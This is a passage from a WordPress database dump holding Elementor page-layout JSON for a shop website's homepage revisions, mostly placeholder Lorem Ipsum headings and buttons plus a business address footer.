mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8042,1425,'_elementor_page_assets','a:0:{}'),(8044,1426,'_elementor_edit_mode','builder'),(8045,1426,'_elementor_template_type','wp-page'),(8046,1426,'_elementor_version','3.7.6'),(8047,1426,'_wp_page_template','elementor_canvas'),(8048,1426,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8049,1426,'_elementor_page_assets','a:0:{}'),(8051,1427,'_elementor_edit_mode','builder'),(8052,1427,'_elementor_template_type','wp-page'),(8053,1427,'_elementor_version','3.7.6'),(8054,1427,'_wp_page_template','elementor_canvas'),(8055,1427,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\"},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST 